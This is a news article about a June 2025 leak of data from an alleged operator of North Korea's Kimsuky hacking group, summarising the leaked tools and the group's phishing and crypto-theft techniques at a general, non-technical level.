A stunning breach has pulled back the curtain on one of North Korea’s most feared cyber groups. An alleged member of Kimsuky, a state-sponsored hacking collective, reportedly lost control of a massive trove of data. This leak exposes the detailed methods and tools Kimsuky uses for online spying and stealing cryptocurrency.
This isn’t just a small slip-up. Security experts at Slow Mist say the data dump amounts to hundreds of gigabytes. It includes everything from browsing histories and malware manuals to actual programs designed to swipe digital money. It’s like finding a secret blueprint for their entire operation.
According to reports from Cryptopolitan, the leaked information paints a vivid picture. It features logs from past phishing schemes and how-to guides for custom backdoor programs. Nasty software like “TomCat kernel backdoor,” tweaked versions of Cobalt Strike, and Ivanti RootRot are all part of the mix. Even Android malware, known as Toybox, was found. These details give us a rare look into the group’s attack capabilities.
How the Veil Was Lifted
The incident, which reportedly happened in early June 2025, started with two compromised computer systems. Both were linked to an operator known by the alias “KIM.” One system was a Linux workstation running Deepin 20.9, seemingly used to build the malicious software. The other was a public virtual private server (VPS). This server hosted materials for “spear-phishing” attacks, like fake login pages and command links.
The hackers responsible, calling themselves “Saber” and “Cyb0rg,” claim they got into both systems. They then pulled out all the content and posted it online for the world to see. While some clues connect “KIM” to Kimsuky’s known online infrastructure, other technical details and language hints suggest a possible link to China. This means the exact origin of the hack against “KIM” is still up in the air.
Meet the Kimsuky Group
Kimsuky has been active since at least 2012. It’s widely known to be tied to North Korea’s General Bureau of Reconnaissance, a powerful intelligence agency. Their main targets include governments, research centers, defense companies, and universities. Their goal is always to gather valuable intelligence.
In 2025, Kimsuky launched operations like DEEP#DRIVE, which used clever, multi-step attacks. These schemes often began with compressed ZIP files. Inside, they hid Windows shortcut files (LNK) that looked like normal documents. When opened, these shortcuts would secretly run PowerShell commands. This would then download malware from legitimate services like Dropbox. The hackers used fake decoy documents to keep their tricks hidden.
Later in 2025, specifically March and April, Kimsuky refined its attacks. They started embedding VBScript and disguised PowerShell code within malicious ZIP files. These hidden scripts would secretly put together commands. They then deployed malware that could record keyboard strokes and grab data from clipboards. Most concerning, this malware could steal private keys from cryptocurrency wallets stored in web browsers like Chrome, Edge, Firefox, and Naver Whale.
A Look at Their Toolkit
The group has constantly improved its tools for secretly accessing remote computers. They’ve used special customized RDP Wrapper modules and tricky proxy malware. They also deployed tools like “forceCopy,” designed to pull login details from browsers without triggering security warnings.
Kimsuky also has a habit of misusing legitimate online services. For instance, in June 2025, they ran a spear-phishing campaign against targets in South Korea. They stored their malware and stolen data in private GitHub repositories. Dropbox also served as a temporary holding spot for their ill-gotten gains. This tactic allowed them to hide their harmful activities within normal network traffic.
The leak against “KIM” is a rare and significant blow to Kimsuky. This group typically operates quietly in the shadows. Exposing their tools and methods could hurt their ability to spy and steal in the short term. However, security experts warn that Kimsuky is resourceful. They will likely adapt their methods and keep up their cyber-espionage activities.